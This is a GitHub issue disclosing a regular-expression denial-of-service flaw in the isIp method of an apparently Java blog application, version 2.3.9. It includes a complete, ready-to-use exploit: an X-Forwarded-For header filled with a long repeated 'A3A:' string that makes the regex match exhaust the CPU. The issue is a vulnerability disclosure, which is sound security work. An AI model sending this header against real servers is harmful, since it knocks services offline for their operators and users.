Skip to content

There is a denial of service vulnerability affecting the latest version 2.3.9 #35

Open
@hacker-wp

Description

@hacker-wp

This vulnerability can lead to a denial of service problem. The application uses regular expressions to match when processing IP addresses, but there are serious vulnerabilities in regular expressions. Attackers can directly pass in specially constructed characters to cause repeated and infinite regular expression matches, which will consume all CPU performance and lead to a denial of service.

Just need to modify the X-Forwarded-for in the http request header:

X-Forwarded-For:5::6:6:5:36:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A

com.zyd.blog.util.RegexUtils.java public static boolean isIp(String ip)

Image

Image

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions